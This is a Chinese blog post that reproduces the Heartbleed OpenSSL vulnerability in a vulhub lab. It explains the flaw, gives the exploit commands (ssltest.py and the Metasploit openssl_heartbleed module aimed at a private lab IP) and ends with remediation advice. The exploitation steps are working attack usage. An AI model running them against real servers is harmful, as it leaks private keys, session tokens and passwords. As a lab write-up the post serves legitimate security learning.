2025年最新CVE-2014-0160漏洞复现

已于 2025-04-16 20:23:56 修改
阅读量1.3k 收藏 15
点赞数 33
分类专栏: CVE漏洞复现合集 文章标签: 网络 安全 web安全
于 2025-03-28 19:05:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_78851087/article/details/146608580
版权

一.漏洞概述

CVE-2014-0160 即 “心脏滴血”(Heartbleed)漏洞,是 OpenSSL 加密程序库中的严重安全漏洞。OpenSSL 广泛用于实现互联网传输层安全(TLS)协议,保障网络通信安全。该漏洞于 2012 年被引入软件,2014 年 4 月首次公开披露 。只要使用存在缺陷的 OpenSSL 实例(服务器或客户端 ),都可能遭受攻击。利用此漏洞,攻击者无需认证,就能远程读取存在漏洞版本的 OpenSSL 服务器内存中多达 64K 的数据,可能获取加密密钥、会话令牌、用户密码等敏感信息,危害极大。

二.漏洞原理

漏洞源于 OpenSSL 实现 TLS 心跳扩展时缺乏对输入的适当验证(缺少边界检查 )。TLS 心跳机制用于维持客户端和服务器间的连接状态,流程为:客户端向服务器发送心跳请求包,服务器收到后读取包内容(包含包类型、数据长度等信息 ),并返回包含请求包内容的响应包。
在存在漏洞的 OpenSSL 版本(主要是 1.0.1 到 1.0.1f 版本 )中,当服务器处理心跳请求时,未正确验证心跳请求包的实际长度,而是直接使用请求包中声明的长度。若攻击者构造特殊心跳请求包,使声明长度与实际长度不同,就会触发漏洞。比如,攻击者让声明长度大于实际长度,服务器在处理时,执行 memcpy 函数复制数据,会将超出心跳包实际数据的内存区域数据也复制出来,导致服务器内存中约 64KB 的数据泄露,攻击者可借此获取敏感信息 。

三.漏洞利用

首先我们打开我们下载好的vulhub

没有下载好的vulhub以及docker 可以去看我的上一篇文章

2025年最新搭建vulhub靶场并且在kail安装docker启动以及相关指令-CSDN博客

cd到这个目录下

cd vulhub-master/openssl/CVE-2014-0160

然后我们输入

docker-compose up -d

开始搭建环境

然后我们输入

查看所有容器

docker ps -a

首先我们先来看打开的端口

http://192.168.111.3:8443/

http://192.168.111.3:8080/

我们可以利用官方给出的exp

python3 ssltest.py localhost -p 8443

我们也可以使用msf

首先我们输入

msfconsole

然后我们搜索

search heartbleed

然后我们使用

use auxiliary/scanner/ssl/openssl_heartbleed

然后我们设置目标主机地址

set rhosts 192.168.111.3
set rport 8443

我们可以先来设置8080端口 来测试一下

最后设置一下verbose,让verbose为true这样我们才可以看到泄露的64kb数据

set verbose true

四.影响版本

CVE-2014-0160(Heartbleed)漏洞主要影响以下 OpenSSL 版本:


 

  • 1.0.1 系列:1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f
  • 其他版本:OpenSSL 1.0.0 系列(部分发行版可能因补丁差异受影响)


 

注意


 

  • 1.0.1g 及以上版本已修复此漏洞。
  • 部分 Linux 发行版(如 Ubuntu、Debian)可能通过 backport 补丁修复了旧版本。

五.修复建议

1. 立即升级 OpenSSL
  • 升级到安全版本bash
# 通用升级命令(根据系统包管理工具调整)
sudo apt update && sudo apt install openssl  # Debian/Ubuntu
sudo yum update openssl  # CentOS/RHEL


 

  • 验证版本bash
openssl version -a
# 预期输出:OpenSSL 1.0.1g 或更高


 

2. 重新生成密钥和证书
  • 漏洞可能导致私钥泄露,需重新生成并替换所有受影响的证书和密钥:bash
# 生成新私钥(2048位或更高)
openssl genrsa -out new_key.pem 4096
# 生成 CSR(证书签名请求)
openssl req -new -key new_key.pem -out new_csr.csr
# 向 CA 重新申请证书


 

3. 禁用 TLS 心跳扩展(临时措施)
  • 若无法立即升级,可通过配置禁用心跳功能(可能影响部分依赖心跳的应用):bash
# 在 Nginx 配置中添加
ssl_heartbeats off;


 

4. 更新依赖 OpenSSL 的服务
  • 确保所有使用 OpenSSL 的服务(如 Apache、Nginx、SSH、邮件服务器)同步升级并重启。
5. 使用安全工具检测
  • 使用官方提供的检测脚本验证漏洞是否存在:bash
wget https://raw.githubusercontent.com/square/heartbleed/master/heartbleed-test.py
python heartbleed-test.py example.com:443


 

6. 监控和日志审计
  • 检查服务器日志,排查异常访问行为,特别是漏洞披露后(2014 年 4 月后)的可疑流量。

注意事项

  • 云服务用户:联系云提供商确认其基础架构是否已修复。
  • 第三方软件:检查依赖的开源库(如 curl、wget)是否更新。
  • 密钥轮换:对所有受影响系统的密钥、证书、会话令牌进行全面轮换。
CVE-2014-0160 Heartbleed分析报告
墨痕诉清风的博客
11-05 289
20144月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160)。OpenSSL Heartbleed模块存在一个BUG,问题存在于ssl/dl_both.c文件中的心跳部分,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据会导致memcpy函数把SSLv3记录之后的数据直接输出,该漏洞导致攻击者可以远程读取存在漏洞版本的OpenSSL服务器内存中多达64K的数据。 1、漏洞说明 OpenSSL Security Adviso
CVE-2025-0282】漏洞分析与远程代码执行利用策略
weixin_47075747的博客
01-17 844
虽然Ivanti通告指出尚未发现CVE-2025-0283被利用,但恰好是与CVE-2025-0282一起修复了本地权限提升漏洞,而CVE-2025-0282是一个利用远程代码执行的漏洞,且具有限制性权限。我们确认,RCE是可行的,但需要成功绕过地址空间布局随机化(ASLR),通过猜测共享库的正确32位基址,特别是。20251月10日,安全公司watchTowr发布了一篇博客,详细阐述了CVE-2025-0282的根本原因,并跟进发布了另一篇博客,介绍了实现远程代码执行(RCE)的利用策略。
心脏滴血漏洞复现CVE-2014-0160
2401_88755455的博客
02-10 438
Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进 行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复 制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄 露。我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的 私钥,用户cookie和密码等。
心脏出血漏洞复现CVE-2014-0160
GaLeng_Yang的博客
09-01 1114
认识:首先简单介绍一下这个漏洞,该漏洞是一个出现在加密程序库OpenSSL的安全漏洞,这个程序呢,是在传输层协议TLS协议之上,这个协议呢被称为心跳协议,这个漏洞就是在心跳协议的工作过程中窃取到一些重要数据,因此这个漏洞的名字被称为心脏出血。危害:远程读取服务器内存中64K的数据,获取内存中的敏感信息,非法入侵获取到密码等加密数据。影响版本:OpenSSL的1.0.1版本到1.0.1f版本。
OpenSSL 心脏滴血漏洞(CVE-2014-0160)漏洞讲解(小白可懂,简单详细)
wangluoanquan111的博客
04-09 2805
靶机:centos7 192.168.139.136攻击机:kali 192.168.139.129确保两台测试机网络能通从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
CVE-2014-0160
Dikesi的博客
02-09 907
Openssl heartbleed漏洞
CVE-2014-0160(OpenSSL心脏滴血漏洞
p_utao的博客
03-17 922
漏洞背景 早在2014,互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞。在黑客社区,它被命名为“心脏出血”,表明网络上出现了“致命内伤”。利用该漏洞,黑客可以获取约30%的https开头网址的用户登录账号密码,其中包括购物、网银、社交、门户等类型的知名网站。 Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就
Heartbleed(心脏出血漏洞- CVE-2014-0160
HaSaKing的博客
05-28 761
2014网络安全界发现了一个名为心脏出血(Heartbleed)的严重安全漏洞,正式编号为CVE-2014-0160。这个漏洞震动了整个互联网,因为它影响到了广泛使用的OpenSSL加密库,该库是保护互联网通信安全的关键组件。本文旨在详细解释心脏出血漏洞的工作原理,它的影响,以及我们如何可以防止此类漏洞再次发生。
CVE-2014-0160-心脏滴血漏洞
Amdy_amdy的博客
12-16 3456
心脏滴血漏洞-CVE-2014-0160 漏洞介绍 20144月7日,OpenSSL发布安全公告,在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。 利用该漏洞
SolarWinds Serv-U 目录遍历漏洞复现(CVE-2024-28995)
0xSec
06-14 1850
SolarWinds Serv-U 存在目录遍历漏洞(CVE-2024-28995),SolarWinds Serv-U 容易受到目录横向漏洞的影响,未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。目前该漏洞技术细节与EXP已在互联网上公开,鉴于该漏洞影响范围较大,建议企业尽快做好自查及防护。
深信服Windows Rce漏洞扫描工具免费下载微软超高危漏洞(CVE-2024-38077 )已复现
weixin_43167326的博客
08-09 1355
这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被广泛部署于开启Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。此漏洞属于基于堆的缓冲区溢出(CWE-122),利用它可能导致攻击者在未认证的情况下获得远程代码执行的能力。微软官方已发布针对该漏洞的修复方案,受影响用户请通过官方链接下载并更新补丁。禁用远程桌面授权服务: 如果系统上不再需要该服务,建议禁用以减少安全漏洞的风险。立即安装更新: 即使你计划禁用远程桌面授权服务,仍然建议尽快安装微软提供的更新。
#渗透测试#批量漏洞挖掘#Cleo产品远程命令执行漏洞CVE-2024-50623)
soc的博客
02-21 678
远程命令执行(RCE,Remote Code Execution),攻击者可通过网络远程注入恶意代码并控制目标系统,属于高危漏洞
CVE-2025-1974 - Ingress NGINX 9.8 中存在严重未经身份验证的远程代码执行漏洞
最新发布
技术超强的网络安全平台
04-27 966
Ingress NGINX 控制器是 Kubernetes 上最受欢迎的入口控制器之一,也是 Kubernetes 的核心项目,在GitHub上拥有超过 18,000 颗星。使用 Ingress-NGINX 是向外部公开 Kubernetes 应用程序的最常用方法之一。作为入口控制器,它的工作是接受传入的流量并将其路由到相关的 Kubernetes 服务,然后服务会根据一组规则将流量转发到相应的 Pod。具体来说,Ingress NGINX 控制器基于流行的NGINX 反向代理。
心脏滴血漏洞——CVE-2014-0160
qq_59359593的博客
06-08 1203
心脏出血是OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。利用该漏洞,攻击者可以远程读取服务器内存中64K的数据,获取内存中的敏感信息。
Openssl心脏滴血——CVE-2014-0160
网安小白的博客
08-28 581
openssl心脏滴血漏洞复现全过程
OpenSSL“Heartbleed”的漏洞exp
0xev4l 网络安全技术博客
04-09 1514
#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. #用法:参数-p "端口" 域名/或ip import sys i
心脏出血漏洞CVE-2014-0160
EC_Carrot的博客
07-01 330
漏洞背景 OpenSSL是OpenSSL团队开发的一个开源的能够实现安全套接层(SSL v2/v3)和安全传输层(TLS v1)协议的通用加密库,它支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 OpenSSL的TLS和DTLS实现过程中的d1_both.c和t1_lib.c文件中存在安全漏洞,该漏洞源于当处理Heartbeat Extension数据包时,缺少边界检查。远程攻击者可借助特制的数据包利用该漏洞读取服务器内存中的敏感信息(如用户名、密码、Cookie、私钥等)。以下版本的OpenS
CVE-2025-21549
03-11
用户提供的引用包括四个不同的CVE漏洞CVE-2023-45866、CVE-2025-1094、CVE-2025-0282以及四个VMware相关的2024漏洞。但CVE-2025-21549并没有在引用中提及。这说明用户的问题超出了现有参考内容的范围,因此需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值